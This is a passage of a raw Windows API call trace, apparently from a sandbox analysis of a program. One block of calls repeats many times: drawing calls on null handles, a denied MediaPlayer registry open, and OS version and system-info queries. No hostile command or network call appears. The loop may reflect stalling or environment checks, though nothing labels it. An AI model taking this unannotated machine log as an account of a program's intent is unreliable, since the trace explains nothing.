StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.309] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.309] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.309] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.309] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.309] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.309] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.309] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xfd0401dc [0091.309] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xff0401d9 [0091.310] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045ae0 [0091.310] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045ae1 [0091.310] CombineRgn (hrgnDst=0x1045ae0, hrgnSrc1=0xfd0401dc, hrgnSrc2=0xff0401d9, iMode=1) returned 1 [0091.310] CombineRgn (hrgnDst=0x1045ae1, hrgnSrc1=0xfd0401dc, hrgnSrc2=0xff0401d9, iMode=4) returned 2 [0091.310] CreateSolidBrush (color=0xff) returned 0x2105adf [0091.310] CreateSolidBrush (color=0xff0000) returned 0x1105ae2 [0091.310] DeleteObject (ho=0x1105ae2) returned 1 [0091.310] DeleteObject (ho=0xff0401d9) returned 1 [0091.310] DeleteObject (ho=0xfd0401dc) returned 1 [0091.310] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.310] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.310] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.310] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.310] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.310] BeginPath (hdc=0x0) returned 0 [0091.310] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.310] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.310] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.310] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.310] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.310] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.310] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.310] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.310] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x401d9 [0091.310] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xfe0401dc [0091.310] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045ae3 [0091.310] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045ae4 [0091.311] CombineRgn (hrgnDst=0x1045ae3, hrgnSrc1=0x401d9, hrgnSrc2=0xfe0401dc, iMode=1) returned 1 [0091.311] CombineRgn (hrgnDst=0x1045ae4, hrgnSrc1=0x401d9, hrgnSrc2=0xfe0401dc, iMode=4) returned 2 [0091.311] CreateSolidBrush (color=0xff) returned 0x2105ae2 [0091.311] CreateSolidBrush (color=0xff0000) returned 0x1105ae5 [0091.311] DeleteObject (ho=0x1105ae5) returned 1 [0091.311] DeleteObject (ho=0xfe0401dc) returned 1 [0091.311] DeleteObject (ho=0x401d9) returned 1 [0091.311] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.311] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.311] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.311] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.311] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.311] BeginPath (hdc=0x0) returned 0 [0091.311] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.311] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.311] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.311] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.311] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.311] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.311] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.311] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.311] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xff0401dc [0091.311] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x10401d9 [0091.311] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045ae6 [0091.311] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045ae7 [0091.311] CombineRgn (hrgnDst=0x1045ae6, hrgnSrc1=0xff0401dc, hrgnSrc2=0x10401d9, iMode=1) returned 1 [0091.311] CombineRgn (hrgnDst=0x1045ae7, hrgnSrc1=0xff0401dc, hrgnSrc2=0x10401d9, iMode=4) returned 2 [0091.311] CreateSolidBrush (color=0xff) returned 0x2105ae5 [0091.311] CreateSolidBrush (color=0xff0000) returned 0x1105ae8 [0091.312] DeleteObject (ho=0x1105ae8) returned 1 [0091.312] DeleteObject (ho=0x10401d9) returned 1 [0091.312] DeleteObject (ho=0xff0401dc) returned 1 [0091.312] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.312] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.312] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.312] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.312] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.312] BeginPath (hdc=0x0) returned 0 [0091.312] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.312] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.312] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.312] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.312] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.312] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.312] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.312] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.312] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x20401d9 [0091.312] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x401dc [0091.312] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045ae9 [0091.312] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045aea [0091.312] CombineRgn (hrgnDst=0x1045ae9, hrgnSrc1=0x20401d9, hrgnSrc2=0x401dc, iMode=1) returned 1 [0091.312] CombineRgn (hrgnDst=0x1045aea, hrgnSrc1=0x20401d9, hrgnSrc2=0x401dc, iMode=4) returned 2 [0091.312] CreateSolidBrush (color=0xff) returned 0x2105ae8 [0091.312] CreateSolidBrush (color=0xff0000) returned 0x1105aeb [0091.312] DeleteObject (ho=0x1105aeb) returned 1 [0091.312] DeleteObject (ho=0x401dc) returned 1 [0091.312] DeleteObject (ho=0x20401d9) returned 1 [0091.312] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.313] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.313] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.313] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.313] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.313] BeginPath (hdc=0x0) returned 0 [0091.313] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.313] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.313] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.313] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.313] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.313] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.313] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.313] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.313] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x10401dc [0091.313] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x30401d9 [0091.313] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045aec [0091.313] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045aed [0091.313] CombineRgn (hrgnDst=0x1045aec, hrgnSrc1=0x10401dc, hrgnSrc2=0x30401d9, iMode=1) returned 1 [0091.313] CombineRgn (hrgnDst=0x1045aed, hrgnSrc1=0x10401dc, hrgnSrc2=0x30401d9, iMode=4) returned 2 [0091.313] CreateSolidBrush (color=0xff) returned 0x2105aeb [0091.313] CreateSolidBrush (color=0xff0000) returned 0x1105aee [0091.313] DeleteObject (ho=0x1105aee) returned 1 [0091.313] DeleteObject (ho=0x30401d9) returned 1 [0091.313] DeleteObject (ho=0x10401dc) returned 1 [0091.313] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.313] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.313] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.314] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.314] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.314] BeginPath (hdc=0x0) returned 0 [0091.314] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.314] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.314] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.314] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.314] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.314] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.314] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.314] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.314] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x40401d9 [0091.314] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x20401dc [0091.314] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045aef [0091.314] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045af0 [0091.314] CombineRgn (hrgnDst=0x1045aef, hrgnSrc1=0x40401d9, hrgnSrc2=0x20401dc, iMode=1) returned 1 [0091.314] CombineRgn (hrgnDst=0x1045af0, hrgnSrc1=0x40401d9, hrgnSrc2=0x20401dc, iMode=4) returned 2 [0091.314] CreateSolidBrush (color=0xff) returned 0x2105aee [0091.314] CreateSolidBrush (color=0xff0000) returned 0x1105af1 [0091.314] DeleteObject (ho=0x1105af1) returned 1 [0091.314] DeleteObject (ho=0x20401dc) returned 1 [0091.314] DeleteObject (ho=0x40401d9) returned 1 [0091.314] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.314] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.314] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.314] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.314] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.314] BeginPath (hdc=0x0) returned 0 [0091.315] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.315] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.315] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.315] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.315] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.315] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.315] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.315] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.315] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x30401dc [0091.315] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x50401d9 [0091.315] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045af2 [0091.315] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045af3 [0091.315] CombineRgn (hrgnDst=0x1045af2, hrgnSrc1=0x30401dc, hrgnSrc2=0x50401d9, iMode=1) returned 1 [0091.315] CombineRgn (hrgnDst=0x1045af3, hrgnSrc1=0x30401dc, hrgnSrc2=0x50401d9, iMode=4) returned 2 [0091.315] CreateSolidBrush (color=0xff) returned 0x2105af1 [0091.315] CreateSolidBrush (color=0xff0000) returned 0x1105af4 [0091.315] DeleteObject (ho=0x1105af4) returned 1 [0091.315] DeleteObject (ho=0x50401d9) returned 1 [0091.315] DeleteObject (ho=0x30401dc) returned 1 [0091.315] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.315] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.315] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.315] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.315] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.315] BeginPath (hdc=0x0) returned 0 [0091.315] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.315] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.315] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.315] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.316] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.316] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.316] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.316] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.316] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x60401d9 [0091.316] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x40401dc [0091.316] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045af5 [0091.316] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045af6 [0091.316] CombineRgn (hrgnDst=0x1045af5, hrgnSrc1=0x60401d9, hrgnSrc2=0x40401dc, iMode=1) returned 1 [0091.316] CombineRgn (hrgnDst=0x1045af6, hrgnSrc1=0x60401d9, hrgnSrc2=0x40401dc, iMode=4) returned 2 [0091.316] CreateSolidBrush (color=0xff) returned 0x2105af4 [0091.316] CreateSolidBrush (color=0xff0000) returned 0x1105af7 [0091.316] DeleteObject (ho=0x1105af7) returned 1 [0091.316] DeleteObject (ho=0x40401dc) returned 1 [0091.316] DeleteObject (ho=0x60401d9) returned 1 [0091.316] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.316] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.316] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.316] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.316] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.316] BeginPath (hdc=0x0) returned 0 [0091.316] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.316] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.316] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.316] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.316] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.316] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.317] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.317] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.317] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x50401dc [0091.317] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x70401d9 [0091.317] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045af8 [0091.317] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045af9 [0091.317] CombineRgn (hrgnDst=0x1045af8, hrgnSrc1=0x50401dc, hrgnSrc2=0x70401d9, iMode=1) returned 1 [0091.317] CombineRgn (hrgnDst=0x1045af9, hrgnSrc1=0x50401dc, hrgnSrc2=0x70401d9, iMode=4) returned 2 [0091.317] CreateSolidBrush (color=0xff) returned 0x2105af7 [0091.317] CreateSolidBrush (color=0xff0000) returned 0x1105afa [0091.317] DeleteObject (ho=0x1105afa) returned 1 [0091.317] DeleteObject (ho=0x70401d9) returned 1 [0091.317] DeleteObject (ho=0x50401dc) returned 1 [0091.317] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.317] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.317] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.317] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.317] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.317] BeginPath (hdc=0x0) returned 0 [0091.317] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.317] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.317] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.317] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.317] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.317] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.317] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.317] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.318] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x80401d9 [0091.318] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x60401dc [0091.318] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045afb [0091.318] CreateRectRgn (x1=0, y1=0, x2=0, 